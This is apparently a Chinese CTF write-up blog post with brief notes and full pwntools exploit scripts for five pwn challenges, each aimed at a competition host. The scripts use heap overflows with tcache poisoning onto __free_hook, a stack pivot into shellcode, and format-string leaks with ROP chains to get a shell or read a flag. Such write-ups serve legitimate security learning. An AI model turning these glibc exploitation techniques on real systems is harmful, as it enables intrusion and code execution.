天翼+长安+Das
自身逆向能力还是太差了
# 天翼杯 - chaos
这题确实是有点素质,再加上还得上课,逆得我头昏眼花
2.27 下的堆溢出题目
首先是对程序输入的逆向,本题目对用户命令输入有些要求,经过长时间的逆向分析得到了如下指令输入格式,分别对应了增查改删
def cmd(num):
    """Send *num* (a raw command string here) once the `>>>` prompt shows up."""
    prompt = '>>>'
    sla(prompt, num)
def add(size, content):
    """Opcode 1 (Cr4at3): allocate a note of *size* bytes and fill it with *content*.

    *size* goes out as a line; *content* is sent raw so no newline lands in the chunk.
    """
    cmd('passwd:Cr4at3 \nopcode:1\n')
    prompt = '>>> '
    sla(prompt, size)
    sa(prompt, content)
def show(idx):
    """Opcode 2 (SH0w): print note *idx*."""
    opcode = 'passwd:SH0w \nopcode:2\n'
    cmd(opcode)
    sla('>>> ', idx)
def edit(idx, content):
    """Opcode 3 (Ed1t): overwrite note *idx* with *content* (sent raw, no newline)."""
    cmd('passwd:Ed1t \nopcode:3\n')
    prompt = '>>> '
    sla(prompt, idx)
    sa(prompt, content)
def delete(idx):
    """Opcode 4 (D3l4te): free note *idx*."""
    opcode = 'passwd:D3l4te \nopcode:4\n'
    cmd(opcode)
    sla('>>> ', idx)
之后发现用户输入的 size 是保存在堆块之中的,而且刚好可以覆盖掉,那么我们直接将其覆盖得特别大,之后就可以溢出修改 chunk 头之类的地方,每一次指令会申请 0x20 大小的 chunk ,可以通过切割 unsorted bin 得到 libc 基地址,之后伪造 tcache 的 fd 就可以申请到 __free_hook
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
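context.log_level = 'debug'
#context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './chaos'
# Grant execute permission without spawning a shell.  The original
# os.system('chmod +x %s' % binary) interpolated the path into a command
# line, so a path with shell metacharacters would be interpreted by /bin/sh.
# 0o111 matches what `chmod +x` sets under the usual umask 022.
os.chmod(binary, os.stat(binary).st_mode | 0o111)
elf = ELF(binary)
libc = elf.libc
#libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    libc = elf.libc
    #p = process(['qemu-arm', binary])
    #p = process(['qemu-arm', binary,'-g','1234'])
    #p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = '8.134.37.86'
    port = '28128'
    p = remote(host,port)
# Tube helpers.
# l64/l32: read up to the 0x7f / 0xf7 byte, keep the trailing 6 / 4 bytes and
# zero-extend them into a 64- / 32-bit value.
# sla/sa: send after a prompt, with / without a trailing newline.
# lg: log a name/value pair in hex.  rint: parse the next *x* received bytes as hex.
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)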
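def dbg(b=None):
    """Attach gdb to the live target *p*.

    With *b* unset, attach and pause so the debugger can be driven by hand;
    otherwise install a `b <b>` breakpoint on attach.  The default is `None`:
    the original `null` is not a Python name, so unless something exports it
    the `def` line itself raises NameError.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)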
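def exhaust(pwn):
    """Keep calling *pwn*, reopening the tube *p* after every failure.

    The loop never exits on its own (the original relies on *pwn* blocking,
    e.g. in p.interactive()).  Only `Exception` is caught: the original bare
    `except:` also swallowed KeyboardInterrupt, so the loop could not be
    stopped from the terminal.
    """
    global p
    attempt = 0
    while True:
        attempt += 1
        try:
            pwn()
        except Exception:
            lg('times ======== > ', attempt)
            p.close()
            p = process(binary) if DEBUG else remote(host, port)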
def one_gadget(filename):
    """Run the external `one_gadget` tool on *filename* and return its raw offsets as ints."""
    log.progress('Leak One_Gadgets...')
    argv = ['one_gadget', '--raw', '-f', filename]  # argument list: no shell involved
    raw = str(subprocess.check_output(argv))
    return [int(token) for token in raw.split(' ')]
def cmd(num):
    """Send *num* (a raw command string here) once the `>>>` prompt shows up."""
    prompt = '>>>'
    sla(prompt, num)
def add(size, content):
    """Opcode 1 (Cr4at3): allocate a note of *size* bytes and fill it with *content*.

    *size* goes out as a line; *content* is sent raw so no newline lands in the chunk.
    """
    cmd('passwd:Cr4at3 \nopcode:1\n')
    prompt = '>>> '
    sla(prompt, size)
    sa(prompt, content)
def show(idx):
    """Opcode 2 (SH0w): print note *idx*."""
    opcode = 'passwd:SH0w \nopcode:2\n'
    cmd(opcode)
    sla('>>> ', idx)
def edit(idx, content):
    """Opcode 3 (Ed1t): overwrite note *idx* with *content* (sent raw, no newline)."""
    cmd('passwd:Ed1t \nopcode:3\n')
    prompt = '>>> '
    sla(prompt, idx)
    sa(prompt, content)
def delete(idx):
    """Opcode 4 (D3l4te): free note *idx*."""
    opcode = 'passwd:D3l4te \nopcode:4\n'
    cmd(opcode)
    sla('>>> ', idx)
# one_gad = one_gadget(libc.path)
# dbg('strchr')
# Six notes of the same size.  Each body ends in p64(0x1000): per the
# writeup the note's recorded size lives inside the chunk, so this plants an
# oversized length that later edit() calls honour.
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
# dbg('* $rebase(0x000000000000F9F)')
# Write past note 5 into the following chunk header; the last flat() element
# is a constructed size (0x220*5 + 0x20*4 + 1 = 0xb21) spanning several notes.
edit(5 , '\x00'*0x218 + flat(0x21 ,0,0,0, 0x220*5 + 0x20*4 + 1) )
delete(4)
# 0x11 one-byte edits.  The writeup says every command allocates a 0x20
# chunk; presumably these carve the freed region until show(3) prints a
# libc pointer — confirm under the debugger if the leak fails.
for i in range(0x11):
    edit(0 , '\x00')
show(3)
# The script assumes the leaked pointer sits 0x70 past __malloc_hook.
__malloc_hook = l64() - 0x70
lg('__malloc_hook',__malloc_hook)
libc.address = __malloc_hook - libc.sym['__malloc_hook']
__free_hook = libc.sym['__free_hook']
system = libc.sym['system']
binsh = libc.search('/bin/sh\x00').next()  # Python 2 iterator API; unused below
# 4c0
# dbg()
add(0x208 , '\x00'*0x200 + p64(0x1000) )
delete(1)
# Per the writeup: forge the freed note's tcache fd so an allocation lands on
# __free_hook; the 0x21 / 0x221 values keep the surrounding headers plausible.
payload = '\x00'*0x200 + flat( 0x100 , __free_hook ,0, 0x21 , 0 , 0 , 0 ,0x221 , __free_hook - 8)
edit(1 , payload )
add(0x208 , 'a')
add(0x208 , flat('/bin/sh\x00' , system))
# dbg()
delete(0)  # free() now goes through the overwritten hook
# dbg()
p.interactive()
'''
@File : chaos.py
@Time : 2021/09/23 10:10:53
@Author : Niyah
'''
# 长安杯 - baige
这题 size 就算出问题也会被写到 size_list 中,比较时也会按照无符号长整型比较,直接写个大 size 再打就完了
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
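context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './baige'
# Grant execute permission without spawning a shell.  The original
# os.system('chmod +x %s' % binary) interpolated the path into a command
# line, so a path with shell metacharacters would be interpreted by /bin/sh.
# 0o111 matches what `chmod +x` sets under the usual umask 022.
os.chmod(binary, os.stat(binary).st_mode | 0o111)
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    libc = elf.libc
    # p = process(['qemu-arm', binary])
    # p = process(['qemu-arm', binary,'-g','1234'])
    # p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = '113.201.14.253'
    port = '21111'
    p = remote(host,port)
# Tube helpers.
# l64/l32: read up to the 0x7f / 0xf7 byte, keep the trailing 6 / 4 bytes and
# zero-extend them into a 64- / 32-bit value.
# sla/sa: send after a prompt, with / without a trailing newline.
# lg: log a name/value pair in hex.  rint: parse the next *x* received bytes as hex.
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)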
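def dbg(b=None):
    """Attach gdb to the live target *p*.

    With *b* unset, attach and pause so the debugger can be driven by hand;
    otherwise install a `b <b>` breakpoint on attach.  The default is `None`:
    the original `null` is not a Python name, so unless something exports it
    the `def` line itself raises NameError.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)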
def cmd(num):
    """Send menu choice *num* once the `>` prompt shows up."""
    prompt = '>'
    sla(prompt, num)
def add(idx, size, text):
    """Menu 1: create note *idx* of *size* bytes; *text* is sent as a line."""
    cmd(1)
    for prompt, value in (('idx', idx), ('size', size), ('content?', text)):
        sla(prompt, value)
def delete(idx):
    """Menu 2: free note *idx*."""
    choice = 2
    cmd(choice)
    sla('idx', idx)
def edit(idx, size, text):
    """Menu 3: rewrite note *idx* with *size* bytes of *text* (sent raw, no newline)."""
    cmd(3)
    for prompt, value in (('idx', idx), ('size', size)):
        sla(prompt, value)
    sa('content?', text)
def show(idx):
    """Menu 4: print note *idx*."""
    choice = 4
    cmd(choice)
    sla('idx', idx)
add( 0 ,0x18, 'a')
# Re-issue menu 1 for the existing idx 0 with size 0xffffffff and stop there.
# Per the writeup the size is recorded in size_list even when the request
# fails, so note 0 now carries a huge length (presumably the program returns
# to the menu without asking for content — confirm if the next sla hangs).
cmd(1)
sla('idx' , 0)
sla('size' , 0xffffffff)
add( 1 , 0x20 , 'a')
add( 2 , 0x400 , 'a')
add( 3 , 0x18 , 'a')
add( 4 , 0x18 , 'a')
delete(1)
# Overflow from note 0: keep a 0x31 header for the freed note 1 and plant a
# size of 0x410 + 0x20 + 1 = 0x431 that covers note 2 and the chunk after it.
payload = flat(
    0,0,
    0,0x31,
    0,0,
    0,0,
    0,0x410 + 0x20+1
)
edit(0 , 0x60 ,payload)
delete(2)
add( 5 , 0x400 , 'a')
show(3)
# dbg()
# The script assumes the leaked pointer sits 0x70 past __malloc_hook.
leak = l64() - 0x70
lg('leak',leak)
libc.address = leak - libc.sym['__malloc_hook']
__free_hook = libc.sym['__free_hook']
system = libc.sym['system']
binsh = libc.search('/bin/sh').next()  # Python 2 iterator API
# Rewrite the freed 0x30 chunk's first word with __free_hook - 8 so a later
# 0x28-byte allocation is handed that address.
payload = flat(
    0,0,
    0,0x31,
    __free_hook - 0x8
)
edit(0 , 0x40 , payload )
add( 5 , 0x28 , 'sh\x00')
add( 6 , 0x28 , flat(binsh , system))  # lands on __free_hook - 8: ['/bin/sh' ptr, system]
delete(5)  # free() now goes through the overwritten hook
p.interactive()
'''
@File : baige.py
@Time : 2021/09/25 11:02:23
@Author : Niyah
'''
# Das-hehepwn
我超!栈题!自己找一下 gadget 即可
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
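context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './bypwn'
# Grant execute permission without spawning a shell.  The original
# os.system('chmod +x %s' % binary) interpolated the path into a command
# line, so a path with shell metacharacters would be interpreted by /bin/sh.
# 0o111 matches what `chmod +x` sets under the usual umask 022.
os.chmod(binary, os.stat(binary).st_mode | 0o111)
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    libc = elf.libc
    # p = process(['qemu-arm', binary])
    # p = process(['qemu-arm', binary,'-g','1234'])
    # p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = 'node4.buuoj.cn'
    port = '26191'
    p = remote(host,port)
# Tube helpers.
# l64/l32: read up to the 0x7f / 0xf7 byte, keep the trailing 6 / 4 bytes and
# zero-extend them into a 64- / 32-bit value.
# sla/sa: send after a prompt, with / without a trailing newline.
# lg: log a name/value pair in hex.  rint: parse the next *x* received bytes as hex.
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)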
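def dbg(b=None):
    """Attach gdb to the live target *p*.

    With *b* unset, attach and pause so the debugger can be driven by hand;
    otherwise install a `b <b>` breakpoint on attach.  The default is `None`:
    the original `null` is not a Python name, so unless something exports it
    the `def` line itself raises NameError.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)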
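def exhaust(pwn):
    """Keep calling *pwn*, reopening the tube *p* after every failure.

    The loop never exits on its own (the original relies on *pwn* blocking,
    e.g. in p.interactive()).  Only `Exception` is caught: the original bare
    `except:` also swallowed KeyboardInterrupt, so the loop could not be
    stopped from the terminal.
    """
    global p
    attempt = 0
    while True:
        attempt += 1
        try:
            pwn()
        except Exception:
            lg('times ======== > ', attempt)
            p.close()
            p = process(binary) if DEBUG else remote(host, port)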
def one_gadget(filename):
    """Run the external `one_gadget` tool on *filename* and return its raw offsets as ints."""
    log.progress('Leak One_Gadgets...')
    argv = ['one_gadget', '--raw', '-f', filename]  # argument list: no shell involved
    raw = str(subprocess.check_output(argv))
    return [int(token) for token in raw.split(' ')]
def cmd(num):
    """Send menu choice *num* once the `>` prompt shows up."""
    prompt = '>'
    sla(prompt, num)
# one_gad = one_gadget(libc.path)
leave = elf.search(asm('leave;ret')).next()  # Python 2 iterator API: first leave;ret in the binary
sla('input' , 'a'*0x20)
# dbg('*0x4008ad')
stack_addr = l64()  # the script treats the bytes echoed back as a stack pointer
lg('stack_addr',stack_addr)
# Small stub reached through the chain below.  It presumably relies on the
# register values the program leaves in rbp/rax/r11 — TODO confirm in gdb.
shellcode = '''
mov rsi , rbp
mov rdi , rax
mov rdx , r11
syscall
'''
# 0x4007f6 / 0x4007b5 are absolute addresses in the binary (so presumably
# non-PIE); the stack_addr offsets are specific to this challenge's frame.
payload = (flat(0, 0x4007f6 ,stack_addr-0x78 , 0x4007b5 , stack_addr -0x28 ) + asm(shellcode) ).ljust(0x50 , 'a') + p64(stack_addr - 0x50) + p64(leave)
# Second stage (rebinds the name): nop sled followed by pwntools' /bin/sh shellcode.
shellcode = asm('nop')*0x80 + asm(shellcraft.sh())
sla('PWN~' , payload)
se(shellcode)
p.interactive()
'''
@File : bypwn.py
@Time : 2021/09/25 12:01:14
@Author : Niyah
'''
# Das-hahapwn
fmt+rop
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
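context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './hahapwn'
# Grant execute permission without spawning a shell.  The original
# os.system('chmod +x %s' % binary) interpolated the path into a command
# line, so a path with shell metacharacters would be interpreted by /bin/sh.
# 0o111 matches what `chmod +x` sets under the usual umask 022.
os.chmod(binary, os.stat(binary).st_mode | 0o111)
elf = ELF(binary)
libc = elf.libc
libc = ELF('./libc-2.23.so')  # the remote libc ships with the challenge; overrides the local one
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    libc = elf.libc
    # p = process(['qemu-arm', binary])
    # p = process(['qemu-arm', binary,'-g','1234'])
    # p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = 'node4.buuoj.cn'
    port = '29734'
    p = remote(host,port)
# Tube helpers.
# l64/l32: read up to the 0x7f / 0xf7 byte, keep the trailing 6 / 4 bytes and
# zero-extend them into a 64- / 32-bit value.
# sla/sa: send after a prompt, with / without a trailing newline.
# lg: log a name/value pair in hex.  rint: parse the next *x* received bytes as hex.
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)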
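def dbg(b=None):
    """Attach gdb to the live target *p*.

    With *b* unset, attach and pause so the debugger can be driven by hand;
    otherwise install a `b <b>` breakpoint on attach.  The default is `None`:
    the original `null` is not a Python name, so unless something exports it
    the `def` line itself raises NameError.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)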
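def exhaust(pwn):
    """Keep calling *pwn*, reopening the tube *p* after every failure.

    The loop never exits on its own (the original relies on *pwn* blocking,
    e.g. in p.interactive()).  Only `Exception` is caught: the original bare
    `except:` also swallowed KeyboardInterrupt, so the loop could not be
    stopped from the terminal.
    """
    global p
    attempt = 0
    while True:
        attempt += 1
        try:
            pwn()
        except Exception:
            lg('times ======== > ', attempt)
            p.close()
            p = process(binary) if DEBUG else remote(host, port)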
def one_gadget(filename):
    """Run the external `one_gadget` tool on *filename* and return its raw offsets as ints."""
    log.progress('Leak One_Gadgets...')
    argv = ['one_gadget', '--raw', '-f', filename]  # argument list: no shell involved
    raw = str(subprocess.check_output(argv))
    return [int(token) for token in raw.split(' ')]
def cmd(num):
    """Send menu choice *num* once the `>` prompt shows up."""
    prompt = '>'
    sla(prompt, num)
# one_gad = one_gadget(libc.path)
# dbg('printf')
# Format-string leak ("fmt" in the writeup): three positional %p reads whose
# values the script uses as a stack pointer, the canary and an address inside
# __libc_start_main.  The comma separators make the parsing below unambiguous.
sla('name' , '%28$p,%27$p,%39$p,')
ru('0x')
stack = rint()
ru(',0x')
canary = rint(16)  # 16 hex digits: the full 64-bit canary
ru(',0x')
__libc_start_main = rint() - 240  # 240 = return-address offset inside __libc_start_main assumed by the script
lg('stack',stack)
lg('canary',canary)
lg('__libc_start_main',__libc_start_main)
# 29 28 26
libc.address = __libc_start_main - libc.sym['__libc_start_main']
read_addr = libc.sym['read']
open_addr = libc.sym['open']
puts_addr = libc.sym['puts']
# Gadget lookup uses the Python 2 iterator API (.next()).
ret = libc.search(asm(' ret')).next()
syscall = libc.search(asm('syscall')).next()  # unused below
pop_rax_ret = libc.search(asm('pop rax; ret')).next()  # unused below
pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
pop_rdx_ret = libc.search(asm('pop rdx; ret')).next()  # unused below
pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
# Where the 'flag\x00' appended after the chain will sit on the stack
# (0xb8 past the leaked pointer — script-specific offset).
flag_addr = stack + 0xb8
# open(flag, 0); read(3, flag_addr, 0x100); puts(flag_addr).  The chain is
# padded to 0x100 bytes so the file name lands at a fixed offset.
orw = flat(
    pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
    pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
    pop_rdi_ret , flag_addr , puts_addr
).ljust(0x100,'\x00') + 'flag\x00'
# 0x68 bytes of filler, the recovered canary, a saved-rbp placeholder, then the chain.
payload = 'a'*0x68 + p64(canary) +p64(0) + orw
sla('you?' , payload)
# l64()
p.interactive()
'''
@File : hahapwn.py
@Time : 2021/09/25 18:06:52
@Author : Niyah
'''
# Das-datasystem
需要在最开始时候绕一下 md5,静态看起来是真的 ex,不如动调一下,绕 md5 的思路是 strcmp 0 截断
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
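context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './datasystem'
# Grant execute permission without spawning a shell.  The original
# os.system('chmod +x %s' % binary) interpolated the path into a command
# line, so a path with shell metacharacters would be interpreted by /bin/sh.
# 0o111 matches what `chmod +x` sets under the usual umask 022.
os.chmod(binary, os.stat(binary).st_mode | 0o111)
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    libc = elf.libc
    # p = process(['qemu-arm', binary])
    # p = process(['qemu-arm', binary,'-g','1234'])
    # p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = 'node4.buuoj.cn'
    port = '27789'
    p = remote(host,port)
# Tube helpers.
# l64/l32: read up to the 0x7f / 0xf7 byte, keep the trailing 6 / 4 bytes and
# zero-extend them into a 64- / 32-bit value.
# sla/sa: send after a prompt, with / without a trailing newline.
# lg: log a name/value pair in hex.  rint: parse the next *x* received bytes as hex.
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)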
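def dbg(b=None):
    """Attach gdb to the live target *p*.

    With *b* unset, attach and pause so the debugger can be driven by hand;
    otherwise install a `b <b>` breakpoint on attach.  The default is `None`:
    the original `null` is not a Python name, so unless something exports it
    the `def` line itself raises NameError.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)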
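def exhaust(pwn):
    """Keep calling *pwn*, reopening the tube *p* after every failure.

    The loop never exits on its own (the original relies on *pwn* blocking,
    e.g. in p.interactive()).  Only `Exception` is caught: the original bare
    `except:` also swallowed KeyboardInterrupt, so the loop could not be
    stopped from the terminal.
    """
    global p
    attempt = 0
    while True:
        attempt += 1
        try:
            pwn()
        except Exception:
            lg('times ======== > ', attempt)
            p.close()
            p = process(binary) if DEBUG else remote(host, port)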
def one_gadget(filename):
    """Run the external `one_gadget` tool on *filename* and return its raw offsets as ints."""
    log.progress('Leak One_Gadgets...')
    argv = ['one_gadget', '--raw', '-f', filename]  # argument list: no shell involved
    raw = str(subprocess.check_output(argv))
    return [int(token) for token in raw.split(' ')]
def cmd(num):
    """Send menu choice *num* once the `>>` prompt shows up."""
    prompt = '>>'
    sla(prompt, num)
def add(size, Content):
    """Menu 1: allocate *size* bytes and send *Content* raw (no trailing newline)."""
    cmd(1)
    sla('Size: ', size)
    sa('Content', Content)
def delete(idx):
    """Menu 2: free note *idx*."""
    choice = 2
    cmd(choice)
    sla('Index', idx)
def show(idx):
    """Menu 3: print note *idx*."""
    choice = 3
    cmd(choice)
    sla('Index', idx)
def edit(idx, Content):
    """Menu 4: rewrite note *idx*; *Content* is sent as a line."""
    cmd(4)
    for prompt, value in (('Index', idx), ('Content', Content)):
        sla(prompt, value)
# one_gad = one_gadget(libc.path)
# Raw password bytes taken from the challenge; the writeup says the MD5 check
# is passed via strcmp stopping at the first NUL.  Sent verbatim with sa().
pwd = '\x1b\xf3\xee\xf3\xb2\x13\xf6\x0e\x9er\xcb\xc5\x83\x97/\x0e\xa7\x93I\xef7\xed\xc7j\xa8Z\xb3\xdaX[\xea\x83'
sa('username' , 'admin')
sa('password:' , pwd)
# add( 0x20 , 'a'*0x20)
add(0x18 , 'a')
add(0x420 , '\x00')
add(0x150 , 'a')
add(0x18 , 'a')
delete(0)
# Re-take slot 0 and write a size of 0x160 + 0x431 = 0x591 into the next
# chunk's header so it spans notes 1 and 2 at once.
add(0x18 , flat(0,0,0,0x160+0x431))
delete(1)
add(0x420 ,'a')
show(2)  # note 2 now overlaps freed memory; presumably a libc pointer is printed
# The script assumes the leaked pointer sits 0x70 past __malloc_hook.
__malloc_hook = l64() - 0x70
libc.address = __malloc_hook - libc.sym['__malloc_hook']
__free_hook = libc.sym['__free_hook']
# setcontext+53 is the entry point the payload below pivots through — TODO confirm the offset for the target libc.
setcontext = libc.sym['setcontext'] + 53
read_addr = libc.sym['read']
open_addr = libc.sym['open']
puts_addr = libc.sym['puts']
# Gadget lookup uses the Python 2 iterator API (.next()).
ret = libc.search(asm(' ret')).next()
pop_rax_ret = libc.search(asm('pop rax; ret')).next()  # unused below
pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
pop_rdx_ret = libc.search(asm('pop rdx; ret')).next()  # unused below
pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
add(0x150 , 'a')
delete(4)
# Note 2 overlaps the freed 0x150 chunk: its first word is replaced with
# __free_hook so a later 0x150 allocation is handed that address.
edit(2 ,p64(__free_hook) )
flag_addr = __free_hook + 0x148  # where 'flag\x00' ends up, 0x148 into the chunk placed on __free_hook
# open(flag, 0); read(3, flag_addr, 0x100); puts(flag_addr).
orw = flat(
    pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
    pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
    pop_rdi_ret , flag_addr , puts_addr
)
# Hook target first, then the chain; the trailing __free_hook + 8 / ret pair is
# what setcontext is expected to load as the new rsp / rip — TODO confirm.
payload = p64(setcontext) + orw + p64(0)*3 + p64(__free_hook + 8) + p64(ret)
add(0x150 , 'a')
add(0x150 , payload.ljust(0x148,'\x00') + 'flag\x00' )  # this allocation lands on __free_hook
# dbg()
delete(5)  # free() now goes through the overwritten hook
# dbg()
p.interactive()
'''
@File : datasystem.py
@Time : 2021/09/25 15:29:56
@Author : Niyah
'''
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。